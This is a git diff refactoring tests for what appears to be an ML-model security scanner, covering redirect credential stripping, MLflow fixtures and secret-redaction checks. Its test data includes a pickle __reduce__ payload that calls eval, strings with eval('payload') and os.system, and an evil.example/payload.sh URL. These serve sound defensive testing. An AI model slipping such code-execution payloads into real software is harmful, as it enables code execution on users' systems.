mock_get.call_args_list[1].kwargs["headers"] == {} @patch("modelaudit.utils.sources.jfrog.requests.get") @@ -148,24 +115,10 @@ def test_download_allows_public_ipv6_redirect_without_credentials( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setenv("MODELAUDIT_JFROG_ALLOWED_HOSTS", "company.jfrog.io") - redirect_response = _FakeStreamingResponse( - b"", - status_code=302, - headers={"Location": "https://[2606:4700:4700::1111]/artifacts/model.bin"}, - ) - final_response = _FakeStreamingResponse(b"data") - mock_get.side_effect = [redirect_response, final_response] - - result = download_artifact( - "https://company.jfrog.io/artifactory/repo/model.bin", - cache_dir=tmp_path, - api_token="test-token", + _assert_public_ip_redirect_without_credentials( + mock_get, tmp_path, monkeypatch, ("https://[2606:4700:4700::1111]/artifacts/model.bin") ) - assert result.read_bytes() == b"data" - assert mock_get.call_args_list[1].kwargs["headers"] == {} - @patch("modelaudit.utils.sources.jfrog.requests.get") def test_download_rejects_untrusted_redirect_hostname_by_default( @@ -199,24 +152,9 @@ def test_download_allows_explicit_redirect_hostname_without_credentials( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setenv("MODELAUDIT_JFROG_ALLOWED_HOSTS", "company.jfrog.io") - monkeypatch.setenv("MODELAUDIT_JFROG_ALLOWED_REDIRECT_HOSTS", "public.redirect.test") - redirect_response = _FakeStreamingResponse( - b"", - status_code=302, - headers={"Location": "https://public.redirect.test/artifacts/model.bin"}, + _assert_allowlisted_jfrog_redirect_without_credentials( + mock_get, tmp_path, monkeypatch, ("public.redirect.test"), ("https://public.redirect.test/artifacts/model.bin") ) - final_response = _FakeStreamingResponse(b"data") - mock_get.side_effect = [redirect_response, final_response] - - result = download_artifact( - "https://company.jfrog.io/artifactory/repo/model.bin", - cache_dir=tmp_path, - api_token="test-token", - ) - - assert result.read_bytes() == b"data" - assert mock_get.call_args_list[1].kwargs["headers"] == {} @patch("modelaudit.utils.sources.jfrog.requests.get") @@ -225,25 +163,10 @@ def test_download_allows_explicit_private_redirect_hostname_without_credentials( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setenv("MODELAUDIT_JFROG_ALLOWED_HOSTS", "company.jfrog.io") - monkeypatch.setenv("MODELAUDIT_JFROG_ALLOWED_REDIRECT_HOSTS", "storage.internal") - redirect_response = _FakeStreamingResponse( - b"", - status_code=302, - headers={"Location": "https://storage.internal/artifacts/model.bin"}, - ) - final_response = _FakeStreamingResponse(b"data") - mock_get.side_effect = [redirect_response, final_response] - - result = download_artifact( - "https://company.jfrog.io/artifactory/repo/model.bin", - cache_dir=tmp_path, - api_token="test-token", + _assert_allowlisted_jfrog_redirect_without_credentials( + mock_get, tmp_path, monkeypatch, ("storage.internal"), ("https://storage.internal/artifacts/model.bin") ) - assert result.read_bytes() == b"data" - assert mock_get.call_args_list[1].kwargs["headers"] == {} - @patch("modelaudit.utils.sources.jfrog.requests.get") def test_download_redirects_do_not_load_netrc_credentials( @@ -325,3 +248,52 @@ def test_download_isolates_cookies_between_untrusted_redirect_origins( assert host_a_cookies is not host_b_cookies assert host_a_cookies.get("CDN_SESSION") == "host-a" assert host_b_cookies.get("CDN_SESSION") is None + + +def _assert_allowlisted_jfrog_redirect_without_credentials( + mock_get: MagicMock, + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, + case_redirect_host: str, + case_redirect_url: str, +) -> None: + monkeypatch.setenv("MODELAUDIT_JFROG_ALLOWED_HOSTS", "company.jfrog.io") + monkeypatch.setenv("MODELAUDIT_JFROG_ALLOWED_REDIRECT_HOSTS", case_redirect_host) + redirect_response = _FakeStreamingResponse( + b"", + status_code=302, + headers={"Location": case_redirect_url}, + ) + final_response = _FakeStreamingResponse(b"data") + mock_get.side_effect = [redirect_response, final_response] + + result = download_artifact( + "https://company.jfrog.io/artifactory/repo/model.bin", + cache_dir=tmp_path, + api_token="test-token", + ) + + assert result.read_bytes() == b"data" + assert mock_get.call_args_list[1].kwargs["headers"] == {} + + +def _assert_public_ip_redirect_without_credentials( + mock_get: MagicMock, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, case_redirect_url: str +) -> None: + monkeypatch.setenv("MODELAUDIT_JFROG_ALLOWED_HOSTS", "company.jfrog.io") + redirect_response = _FakeStreamingResponse( + b"", + status_code=302, + headers={"Location": case_redirect_url}, + ) + final_response = _FakeStreamingResponse(b"data") + mock_get.side_effect = [redirect_response, final_response] + + result = download_artifact( + "https://company.jfrog.io/artifactory/repo/model.bin", + cache_dir=tmp_path, + api_token="test-token", + ) + + assert result.read_bytes() == b"data" + assert mock_get.call_args_list[1].kwargs["headers"] == {} diff --git a/tests/integrations/test_mlflow_integration.py b/tests/integrations/test_mlflow_integration.py index 894037465..6932062bf 100644 --- a/tests/integrations/test_mlflow_integration.py +++ b/tests/integrations/test_mlflow_integration.py @@ -1427,16 +1427,9 @@ class RunsArtifactRepository: def __init__(self) -> None: self.repo = RemoteArtifactRepository("s3://trusted-bucket/runs/run-1/model") - @staticmethod - def parse_runs_uri(uri: str) -> tuple[str, str | None]: - assert uri == "runs:/run-1/model" - return "run-1", "model" + parse_runs_uri = staticmethod(_parse_runs_fixture_uri) - @staticmethod - def get_underlying_uri(uri: str, tracking_uri: str | None = None) -> str: - assert uri == "runs:/run-1/model" - assert tracking_uri is None - return "s3://trusted-bucket/runs/run-1/model" + get_underlying_uri = staticmethod(_runs_fixture_underlying_uri) @staticmethod def _get_logged_model_artifact_repo(*, run_id: str, name: str) -> RemoteArtifactRepository: @@ -1519,16 +1512,9 @@ def __init__(self, run_repository: RemoteArtifactRepository) -> None: self.download_artifacts = MagicMock(side_effect=AssertionError("wrapper download must not be used")) self._get_logged_model_artifact_repo = MagicMock() - @staticmethod - def parse_runs_uri(uri: str) -> tuple[str, str | None]: - assert uri == "runs:/run-1/model" - return "run-1", "model" + parse_runs_uri = staticmethod(_parse_runs_fixture_uri) - @staticmethod - def get_underlying_uri(uri: str, tracking_uri: str | None = None) -> str: - assert uri == "runs:/run-1/model" - assert tracking_uri is None - return "s3://trusted-bucket/runs/run-1/model" + get_underlying_uri = staticmethod(_runs_fixture_underlying_uri) class ModelsArtifactRepository: def __init__(self, repo: Any) -> None: @@ -3470,3 +3456,14 @@ def test_scan_mlflow_model_no_registry_uri(tmp_path: Path, monkeypatch: pytest.M # Verify set_registry_uri was not called mock_mlflow.set_registry_uri.assert_not_called() + + +def _parse_runs_fixture_uri(uri: str) -> tuple[str, str | None]: + assert uri == "runs:/run-1/model" + return "run-1", "model" + + +def _runs_fixture_underlying_uri(uri: str, tracking_uri: str | None = None) -> str: + assert uri == "runs:/run-1/model" + assert tracking_uri is None + return "s3://trusted-bucket/runs/run-1/model" diff --git a/tests/scanners/test_base_scanner.py b/tests/scanners/test_base_scanner.py index d44ea519a..bd36b98a6 100644 --- a/tests/scanners/test_base_scanner.py +++ b/tests/scanners/test_base_scanner.py @@ -3,7 +3,7 @@ import os from datetime import datetime, timedelta, timezone from pathlib import Path -from typing import Any, ClassVar +from typing import TYPE_CHECKING, Any, ClassVar import pytest @@ -20,6 +20,19 @@ make_trusted_source_provenance, ) +if TYPE_CHECKING: + from modelaudit.detectors.network_comm import NetworkCommDetector + + +def raise_controlled_failure( + self: "NetworkCommDetector", + data: bytes, + context: str = "", + *, + onnx_metadata_context: bool = False, +) -> list[dict[str, Any]]: + raise RuntimeError("controlled network detector failure") + class MockScanner(BaseScanner): """Mock scanner implementation for testing the BaseScanner class.""" @@ -108,15 +121,6 @@ def test_collect_network_communication_findings_preserves_positional_result( """The public positional result argument must not be rebound to newer options.""" from modelaudit.detectors.network_comm import NetworkCommDetector - def raise_controlled_failure( - self: NetworkCommDetector, - data: bytes, - context: str = "", - *, - onnx_metadata_context: bool = False, - ) -> list[dict[str, Any]]: - raise RuntimeError("controlled network detector failure") - monkeypatch.setattr(NetworkCommDetector, "scan", raise_controlled_failure) scanner = MockScanner() result = scanner._create_result() @@ -143,15 +147,6 @@ def test_collect_network_communication_findings_preserves_positional_max_finding def capture_init(self: NetworkCommDetector, config: dict[str, Any] | None = None) -> None: captured_config.update(config or {}) - def raise_controlled_failure( - self: NetworkCommDetector, - data: bytes, - context: str = "", - *, - onnx_metadata_context: bool = False, - ) -> list[dict[str, Any]]: - raise RuntimeError("controlled network detector failure") - monkeypatch.setattr(NetworkCommDetector, "__init__", capture_init) monkeypatch.setattr(NetworkCommDetector, "scan", raise_controlled_failure) scanner = MockScanner() diff --git a/tests/scanners/test_cntk_scanner.py b/tests/scanners/test_cntk_scanner.py index 79f1a4cf8..adcdb9ee7 100644 --- a/tests/scanners/test_cntk_scanner.py +++ b/tests/scanners/test_cntk_scanner.py @@ -7,6 +7,7 @@ from modelaudit.models import ModelAuditResultModel from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity, ScanResult from modelaudit.scanners.cntk_scanner import DISCOVERY_ASSUMPTIONS, CntkScanner +from tests.helpers.cache import scan_without_cache as _scan_without_cache def _write_legacy_cntk(path: Path, payload: bytes = b"") -> None: @@ -20,10 +21,6 @@ def _write_cntkv2(path: Path, payload: bytes = b"", include_structure: bool = Tr path.write_bytes(prefix + structure + payload) -def _scan_without_cache(path: Path) -> ModelAuditResultModel: - return scan_model_directory_or_file(str(path), cache_scan_results=False) - - def _assert_cntk_read_failure( direct: ScanResult, aggregate: ModelAuditResultModel, diff --git a/tests/scanners/test_compressed_scanner.py b/tests/scanners/test_compressed_scanner.py index 0a64e6b40..e2d80f551 100644 --- a/tests/scanners/test_compressed_scanner.py +++ b/tests/scanners/test_compressed_scanner.py @@ -7,6 +7,7 @@ import tarfile import zlib from collections.abc import Callable +from functools import partial from pathlib import Path from typing import Literal @@ -25,13 +26,12 @@ _CompressedPaddingLimitExceeded, _MissingOptionalDependencyError, ) +from tests.helpers.file_creators import EvalPayload TarWriteMode = Literal["w:gz", "w:bz2", "w:xz"] -class _MaliciousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (eval, ("print('owned')",)) +_MaliciousPayload = partial(EvalPayload, ("print('owned')",)) _LZ4_FRAME_MAGIC = b"\x04\x22\x4d\x18" diff --git a/tests/scanners/test_coreml_scanner.py b/tests/scanners/test_coreml_scanner.py index e2fd69196..6423c4e6f 100644 --- a/tests/scanners/test_coreml_scanner.py +++ b/tests/scanners/test_coreml_scanner.py @@ -14,23 +14,9 @@ detect_file_format, detect_format_from_extension, ) - - -def _encode_varint(value: int) -> bytes: - out = bytearray() - while value >= 0x80: - out.append((value & 0x7F) | 0x80) - value >>= 7 - out.append(value) - return bytes(out) - - -def _field_varint(field_number: int, value: int) -> bytes: - return _encode_varint((field_number << 3) | 0) + _encode_varint(value) - - -def _field_bytes(field_number: int, value: bytes) -> bytes: - return _encode_varint((field_number << 3) | 2) + _encode_varint(len(value)) + value +from tests.helpers.file_creators import _encode_protobuf_varint as _encode_varint +from tests.helpers.file_creators import protobuf_bytes_field as _field_bytes +from tests.helpers.file_creators import protobuf_varint_field as _field_varint def _build_user_metadata_entry(key: str, value: str) -> bytes: diff --git a/tests/scanners/test_evidence_redaction.py b/tests/scanners/test_evidence_redaction.py index 0757f0e62..527ef0a87 100644 --- a/tests/scanners/test_evidence_redaction.py +++ b/tests/scanners/test_evidence_redaction.py @@ -17,6 +17,7 @@ redact_evidence_value, redact_untrusted_error_message, ) +from tests.helpers.assertions import _assert_absent, _assert_present @pytest.mark.parametrize( @@ -126,8 +127,7 @@ def test_redacts_multiline_secret_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) assert "MULTILINESECRET123" not in redacted - assert f'private_key = """{REDACTED_EVIDENCE_VALUE}"""' in redacted - assert "os.system" in redacted + _assert_present(redacted, f'private_key = """{REDACTED_EVIDENCE_VALUE}"""', "os.system") def test_redacts_escaped_quote_secret_assignments() -> None: @@ -137,8 +137,7 @@ def test_redacts_escaped_quote_secret_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) assert "ESCAPEDSECRET123" not in redacted - assert f'api_key = "{REDACTED_EVIDENCE_VALUE}"' in redacted - assert "os.system" in redacted + _assert_present(redacted, f'api_key = "{REDACTED_EVIDENCE_VALUE}"', "os.system") def test_redacts_prefixed_string_literal_secret_assignments() -> None: @@ -147,9 +146,7 @@ def test_redacts_prefixed_string_literal_secret_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "RAWSECRET123" not in redacted - assert "BYTESECRET456" not in redacted - assert "MAPSECRET789" not in redacted + _assert_absent(redacted, "RAWSECRET123", "BYTESECRET456", "MAPSECRET789") assert f'api_key = r"{REDACTED_EVIDENCE_VALUE}"' in redacted assert f'headers["Authorization"] = b"{REDACTED_EVIDENCE_VALUE}"' in redacted assert f'"client_secret": f"{REDACTED_EVIDENCE_VALUE}"' in redacted @@ -188,7 +185,8 @@ def test_redacts_proxy_and_camel_case_auth_scheme_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) - for secret in ( + _assert_absent( + redacted, "PROXYAUTHSECRET1234567890", "PASCALPROXYSECRET1234567890", "XAPIKEYSECRET1234567890", @@ -196,8 +194,7 @@ def test_redacts_proxy_and_camel_case_auth_scheme_assignments() -> None: "HEADERPROXYSECRET1234567890", "SPACEDPROXYSECRET1234567890", "MAPPINGPROXYSECRET1234567890", - ): - assert secret not in redacted + ) assert "proxyAuthorization: " in redacted assert "ProxyAuthorization = " in redacted assert "XApiKey: " in redacted @@ -218,9 +215,7 @@ def test_redacts_punctuated_auth_scheme_credentials() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "COLON:SECRET123456" not in redacted - assert "BANG!SECRET123456" not in redacted - assert "PERCENT%SECRET123456" not in redacted + _assert_absent(redacted, "COLON:SECRET123456", "BANG!SECRET123456", "PERCENT%SECRET123456") assert f"apiKey = {REDACTED_EVIDENCE_VALUE}" in redacted assert f"customToken = {REDACTED_EVIDENCE_VALUE}" in redacted assert f"authToken = {REDACTED_EVIDENCE_VALUE}" in redacted @@ -496,8 +491,7 @@ def test_redacts_parameterized_authorization_inside_python_string() -> None: redacted = redact_evidence_string(text, max_chars=None) assert "DIGESTSECRET123456" not in redacted - assert "Authorization: " in redacted - assert 'eval("payload")' in redacted + _assert_present(redacted, "Authorization: ", 'eval("payload")') ast.parse(redacted) @@ -527,8 +521,7 @@ def test_redacts_parameterized_authorization_split_across_explicit_string_concat redacted = redact_evidence_string(text, max_chars=None) assert "CONCATSECRET123456" not in redacted - assert f"Authorization: {REDACTED_EVIDENCE_VALUE}" in redacted - assert 'eval("payload")' in redacted + _assert_present(redacted, f"Authorization: {REDACTED_EVIDENCE_VALUE}", 'eval("payload")') ast.parse(redacted) @@ -629,8 +622,7 @@ def test_redacts_parameterized_authorization_dynamic_fstring_without_hiding_suff redacted = redact_evidence_string(text, max_chars=None) assert "{secret}" not in redacted - assert "{eval(" in redacted - assert 'print("done")' in redacted + _assert_present(redacted, "{eval(", 'print("done")') ast.parse(redacted) @@ -640,8 +632,7 @@ def test_redacts_parameterized_authorization_in_fstring_with_escaped_braces() -> redacted = redact_evidence_string(text, max_chars=None) assert "secret" not in redacted - assert f"Authorization: {REDACTED_EVIDENCE_VALUE}" in redacted - assert 'eval("payload")' in redacted + _assert_present(redacted, f"Authorization: {REDACTED_EVIDENCE_VALUE}", 'eval("payload")') ast.parse(redacted) @@ -655,8 +646,7 @@ def test_redacts_multiple_python_authorization_literals_in_source_order() -> Non redacted = redact_evidence_string(text, max_chars=None) - for secret in ("KEYSECRET111111", "VALUESECRET222222", "KEYSECRET333333", "VALUESECRET444444"): - assert secret not in redacted + _assert_absent(redacted, "KEYSECRET111111", "VALUESECRET222222", "KEYSECRET333333", "VALUESECRET444444") assert redacted.count("Authorization: ") == 4 assert 'eval("payload")' in redacted ast.parse(redacted) @@ -664,7 +654,7 @@ def test_redacts_multiple_python_authorization_literals_in_source_order() -> Non def test_preserves_camel_case_credential_control_near_matches() -> None: """Credential-looking counters and controls should not be treated as secrets.""" - text = ( + _assert_evidence_unchanged( "xApiKeyCount = 2; xApiKeyCounter = 3; xApiKeyCount2 = 4; apiKeyTimeout = 30; " "myApiKeyTimeoutMs = 60; clientSecretStatus = 'present'; sessionTokenEnabled = True; " "sessionTokenEnabledFlag = False; proxyAuthorizationEnabled = True; " @@ -672,8 +662,6 @@ def test_preserves_camel_case_credential_control_near_matches() -> None: "RequestSignatureAlgorithm = https://evil.example/payload.sh; tokenizer = 'visible'; eval('1')" ) - assert redact_evidence_string(text, max_chars=None) == text - def test_redacts_escaped_json_mapping_secret_values() -> None: """Escaped JSON/config mappings embedded in strings should be sanitized.""" @@ -682,8 +670,7 @@ def test_redacts_escaped_json_mapping_secret_values() -> None: redacted = redact_evidence_string(text, max_chars=None) assert "ESCAPEDJSONSECRET123" not in redacted - assert r"\"api_key\":\"\"" in redacted - assert r"\"safe\":\"ok\"" in redacted + _assert_present(redacted, r"\"api_key\":\"\"", r"\"safe\":\"ok\"") def test_redacts_camel_case_secret_assignments() -> None: @@ -718,9 +705,7 @@ def test_redacts_non_scalar_sensitive_mapping_values() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "ARRAYSECRET123" not in redacted - assert "OBJECTSECRET456" not in redacted - assert "BLOCKSECRET789" not in redacted + _assert_absent(redacted, "ARRAYSECRET123", "OBJECTSECRET456", "BLOCKSECRET789") assert f'"api_key": {REDACTED_EVIDENCE_VALUE}' in redacted assert f'"clientSecret": {REDACTED_EVIDENCE_VALUE}' in redacted assert f"api_key: |\n {REDACTED_EVIDENCE_VALUE}" in redacted @@ -737,9 +722,7 @@ def test_redacts_parenthesized_quoted_secret_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "PARENSECRET123" not in redacted - assert "HEADERSECRET456" not in redacted - assert "MAPSECRET789" not in redacted + _assert_absent(redacted, "PARENSECRET123", "HEADERSECRET456", "MAPSECRET789") assert f'api_key = ("{REDACTED_EVIDENCE_VALUE}")' in redacted assert f'headers["Authorization"] = (\n "{REDACTED_EVIDENCE_VALUE}"\n)' in redacted assert f'"clientSecret": ("{REDACTED_EVIDENCE_VALUE}")' in redacted @@ -765,9 +748,7 @@ def test_redacts_subscripted_and_mapping_secret_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "ENVSECRET123" not in redacted - assert "HEADERSECRET456" not in redacted - assert "MAPSECRET789" not in redacted + _assert_absent(redacted, "ENVSECRET123", "HEADERSECRET456", "MAPSECRET789") assert 'os.environ["API_KEY"] = ""' in redacted assert 'headers["Authorization"] = ""' in redacted assert '"client_secret": ""' in redacted @@ -863,10 +844,8 @@ def test_redacts_nested_bracketed_and_json_sensitive_query_parameters() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "NESTEDARRAYSECRET123" not in redacted - assert "JSONSECRET456" not in redacted - assert "redirect=" in redacted - assert "payload=" in redacted + _assert_absent(redacted, "NESTEDARRAYSECRET123", "JSONSECRET456") + _assert_present(redacted, "redirect=", "payload=") def test_redacts_credentials_inside_nested_redirect_urls() -> None: @@ -905,11 +884,8 @@ def test_redacts_bracketed_sensitive_query_parameters() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "ARRAYSECRET123" not in redacted - assert "INDEXSECRET456" not in redacted - assert "api_key%5B%5D=" in redacted - assert "token%5B0%5D=" in redacted - assert "ok=1" in redacted + _assert_absent(redacted, "ARRAYSECRET123", "INDEXSECRET456") + _assert_present(redacted, "api_key%5B%5D=", "token%5B0%5D=", "ok=1") def test_redacts_malformed_userinfo_url() -> None: @@ -975,10 +951,8 @@ def test_redacts_encoded_assignments_used_as_query_keys() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "QUERYKEYSECRET123" not in redacted - assert "AUTHKEYSECRET456" not in redacted - assert "?token=" in redacted - assert "?authorization=" in redacted + _assert_absent(redacted, "QUERYKEYSECRET123", "AUTHKEYSECRET456") + _assert_present(redacted, "?token=", "?authorization=") def test_redacts_prefixed_iteratively_encoded_query_assignments() -> None: @@ -1149,10 +1123,8 @@ def test_redacts_legacy_access_identifier_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "AKIAEXAMPLEACCESSKEY" not in redacted - assert "service-account" not in redacted - assert "AWSAccessKeyId=" in redacted - assert "google_access_id=" in redacted + _assert_absent(redacted, "AKIAEXAMPLEACCESSKEY", "service-account") + _assert_present(redacted, "AWSAccessKeyId=", "google_access_id=") @pytest.mark.parametrize( @@ -1259,9 +1231,7 @@ def test_preserves_deeply_percent_encoded_benign_value_within_decode_budget() -> ], ) def test_preserves_standalone_secret_near_matches(near_match: str) -> None: - text = f"prefix {near_match} suffix" - - assert redact_evidence_string(text, max_chars=None) == text + _assert_evidence_unchanged(f"prefix {near_match} suffix") def test_existing_token_assignment_redaction_still_applies() -> None: @@ -1279,10 +1249,8 @@ def test_redacts_r_assignment_operators() -> None: max_chars=500, ) - assert "R_TOKEN_SECRET" not in redacted - assert "R_PASSWORD_SECRET" not in redacted - assert f"token <- '{REDACTED_EVIDENCE_VALUE}'" in redacted - assert f"password <<- {REDACTED_EVIDENCE_VALUE}" in redacted + _assert_absent(redacted, "R_TOKEN_SECRET", "R_PASSWORD_SECRET") + _assert_present(redacted, f"token <- '{REDACTED_EVIDENCE_VALUE}'", f"password <<- {REDACTED_EVIDENCE_VALUE}") def test_redacts_access_identifier_r_assignments() -> None: @@ -1341,10 +1309,8 @@ def test_redacts_r_equals_assignments_for_quoted_identifiers_and_raw_values() -> max_chars=500, ) - assert "BACKTICK_EQUALS_SECRET" not in redacted - assert "RAW_EQUALS_SECRET" not in redacted - assert f'`access token` = "{REDACTED_EVIDENCE_VALUE}"' in redacted - assert f"token = {REDACTED_EVIDENCE_VALUE}" in redacted + _assert_absent(redacted, "BACKTICK_EQUALS_SECRET", "RAW_EQUALS_SECRET") + _assert_present(redacted, f'`access token` = "{REDACTED_EVIDENCE_VALUE}"', f"token = {REDACTED_EVIDENCE_VALUE}") def test_redacts_prefixed_camel_case_r_assignments() -> None: @@ -1356,14 +1322,14 @@ def test_redacts_prefixed_camel_case_r_assignments() -> None: max_chars=500, ) - for secret in ( + _assert_absent( + redacted, "DB_PASSWORD_SECRET", "SESSION_TOKEN_SECRET", "GITHUB_TOKEN_SECRET", "BACKTICK_CAMEL_SECRET", "PWD_SECRET", - ): - assert secret not in redacted + ) assert f'dbPassword <- "{REDACTED_EVIDENCE_VALUE}"' in redacted assert f'sessionToken <<- "{REDACTED_EVIDENCE_VALUE}"' in redacted assert f'githubToken <- "{REDACTED_EVIDENCE_VALUE}"' in redacted @@ -1381,15 +1347,15 @@ def test_redacts_dotted_r_assignments_and_raw_strings() -> None: max_chars=700, ) - for secret in ( + _assert_absent( + redacted, "DOT_LEFT_SECRET", "DOT_RIGHT_SECRET", "RAW_LEFT_SECRET", "RAW_RIGHT_SECRET", "QUOTED_NAME_SECRET", "QUOTED_RAW_SECRET", - ): - assert secret not in redacted + ) assert "raw values may contain" not in redacted assert f'api.key <- "{REDACTED_EVIDENCE_VALUE}"' in redacted assert f'"{REDACTED_EVIDENCE_VALUE}" -> access.token' in redacted @@ -1409,14 +1375,9 @@ def test_redacts_r_indexed_member_and_slot_assignment_targets() -> None: max_chars=700, ) - for secret in ( - "INDEXED_SECRET", - "MEMBER_SECRET", - "SLOT_SECRET", - "SUBSCRIPT_SECRET", - "RIGHT_MEMBER_SECRET", - ): - assert secret not in redacted + _assert_absent( + redacted, "INDEXED_SECRET", "MEMBER_SECRET", "SLOT_SECRET", "SUBSCRIPT_SECRET", "RIGHT_MEMBER_SECRET" + ) assert f'token[1] <- "{REDACTED_EVIDENCE_VALUE}"' in redacted assert f'config$token <- "{REDACTED_EVIDENCE_VALUE}"' in redacted assert f'config@password <- "{REDACTED_EVIDENCE_VALUE}"' in redacted @@ -1572,9 +1533,7 @@ def test_long_python_return_annotation_is_not_treated_as_r_assignment() -> None: def test_python_raw_default_is_not_treated_as_r_assignment() -> None: """Parseable Python containing a raw string should retain its return annotation.""" - text = 'def handler(value=r"(VISIBLE)") -> token:\n return value' - - assert redact_evidence_string(text, max_chars=None) == text + _assert_evidence_unchanged('def handler(value=r"(VISIBLE)") -> token:\n return value') def test_large_rightward_assignment_evidence_avoids_pathological_backtracking() -> None: @@ -1594,8 +1553,7 @@ def test_many_raw_assignments_are_redacted_in_one_pass() -> None: redacted = redact_evidence_string(text, max_chars=len(text) * 2) - assert "RAW_SECRET_0000" not in redacted - assert "RAW_SECRET_1999" not in redacted + _assert_absent(redacted, "RAW_SECRET_0000", "RAW_SECRET_1999") assert redacted.count(REDACTED_EVIDENCE_VALUE) == 2_000 @@ -1605,8 +1563,7 @@ def test_many_rightward_assignments_are_redacted_in_one_pass() -> None: redacted = redact_evidence_string(text, max_chars=len(text) * 2) - assert "RIGHTWARD_SECRET_0000" not in redacted - assert "RIGHTWARD_SECRET_1999" not in redacted + _assert_absent(redacted, "RIGHTWARD_SECRET_0000", "RIGHTWARD_SECRET_1999") assert redacted.count(REDACTED_EVIDENCE_VALUE) == 2_000 @@ -1833,8 +1790,7 @@ def test_redacts_authorization_aliases_in_specialized_string_contexts() -> None: redacted = redact_evidence_string(text, max_chars=None) - for secret in (subscript_secret, r_left_secret, r_right_secret, unterminated_secret): - assert secret not in redacted + _assert_absent(redacted, subscript_secret, r_left_secret, r_right_secret, unterminated_secret) assert 'headers["proxyAuthorization"] = ""' in redacted assert 'headers$proxyAuthorization <- ""' in redacted assert '"" -> headers$proxyAuthorization' in redacted @@ -2579,10 +2535,8 @@ def test_redacts_python_container_secret_assignments() -> None: redacted = redact_evidence_string(text, max_chars=500) - assert "ENVSECRET123" not in redacted - assert "DICTSECRET456" not in redacted - assert 'os.environ["AWS_SECRET_ACCESS_KEY"] = ""' in redacted - assert '{"client_secret": ""}' in redacted + _assert_absent(redacted, "ENVSECRET123", "DICTSECRET456") + _assert_present(redacted, 'os.environ["AWS_SECRET_ACCESS_KEY"] = ""', '{"client_secret": ""}') def test_redacts_expression_and_authorization_assignments_without_losing_code_context() -> None: @@ -2627,8 +2581,7 @@ def test_unparseable_expression_assignment_redacts_complete_rhs() -> None: redacted = redact_evidence_string(text, max_chars=500) assert secret not in redacted - assert "client_secret = " in redacted - assert 'eval("1 + 1")' in redacted + _assert_present(redacted, "client_secret = ", 'eval("1 + 1")') def test_expression_redaction_preserves_annotations_and_argument_boundaries() -> None: @@ -2656,9 +2609,7 @@ def test_expression_redaction_preserves_annotations_and_argument_boundaries() -> def test_preserves_python_return_annotation_named_token() -> None: """Python return annotations must not be mistaken for R rightward assignments.""" - text = "def build() -> token:\n return visible" - - assert redact_evidence_string(text, max_chars=None) == text + _assert_evidence_unchanged("def build() -> token:\n return visible") def test_unparseable_continued_sensitive_assignment_redacts_complete_rhs() -> None: @@ -2669,8 +2620,7 @@ def test_unparseable_continued_sensitive_assignment_redacts_complete_rhs() -> No redacted = redact_evidence_string(text, max_chars=500) assert secret not in redacted - assert "client_secret = " in redacted - assert 'eval("1 + 1")' in redacted + _assert_present(redacted, "client_secret = ", 'eval("1 + 1")') def test_unparseable_annotated_sensitive_assignment_redacts_literal() -> None: @@ -2712,8 +2662,7 @@ def test_unparseable_compound_sensitive_assignment_redacts_literal() -> None: redacted = redact_evidence_string(text, max_chars=500) assert secret not in redacted - assert "token += " in redacted - assert 'eval("1 + 1")' in redacted + _assert_present(redacted, "token += ", 'eval("1 + 1")') def test_redacts_bytes_keyed_and_walrus_sensitive_assignments() -> None: @@ -2727,9 +2676,7 @@ def test_redacts_bytes_keyed_and_walrus_sensitive_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "BYTESECRET1234567890" not in redacted - assert "AUTHSECRET1234567890" not in redacted - assert "WALRUSSECRET1234567890" not in redacted + _assert_absent(redacted, "BYTESECRET1234567890", "AUTHSECRET1234567890", "WALRUSSECRET1234567890") assert 'os.environb[b"AWS_SECRET_ACCESS_KEY"] = ' in redacted assert 'headers[b"Authorization"] = ' in redacted assert "token := " in redacted @@ -2746,8 +2693,7 @@ def test_redacts_prefixed_camel_case_secret_assignments() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "AWSSECRET1234567890" not in redacted - assert "AZURESECRET1234567890" not in redacted + _assert_absent(redacted, "AWSSECRET1234567890", "AZURESECRET1234567890") assert 'awsSecretAccessKey = ""' in redacted assert 'azureClientSecret = ""' in redacted assert 'awsSecretsManagerRegion = "us-east-1"' in redacted @@ -2763,8 +2709,7 @@ def test_redacts_unpacking_assignments_and_preserves_lambda_context() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "UNPACKSECRET1234567890" not in redacted - assert "LAMBDASECRET1234567890" not in redacted + _assert_absent(redacted, "UNPACKSECRET1234567890", "LAMBDASECRET1234567890") assert "api_key, other = " in redacted assert 'safe, visible = "left", "right"' in redacted assert 'lambda api_key="": eval("1 + 1")' in redacted @@ -2782,9 +2727,7 @@ def test_redacts_sensitive_setter_call_values() -> None: redacted = redact_evidence_string(text, max_chars=None) - assert "PUTENVSECRET1234567890" not in redacted - assert "SETATTRSECRET1234567890" not in redacted - assert "DEFAULTSECRET1234567890" not in redacted + _assert_absent(redacted, "PUTENVSECRET1234567890", "SETATTRSECRET1234567890", "DEFAULTSECRET1234567890") assert 'os.putenv("AWS_SECRET_ACCESS_KEY", )' in redacted assert 'setattr(config, "api_key", )' in redacted assert 'headers.setdefault("Authorization", )' in redacted @@ -2806,13 +2749,9 @@ def test_redacts_embedded_name_value_credentials_and_generic_calls() -> None: redacted = redact_evidence_string(text, max_chars=None) - for secret in ( - "DICTSECRET1234567890", - "KEYDICTSECRET1234567890", - "CALLSECRET1234567890", - "KEYCALLSECRET1234567890", - ): - assert secret not in redacted 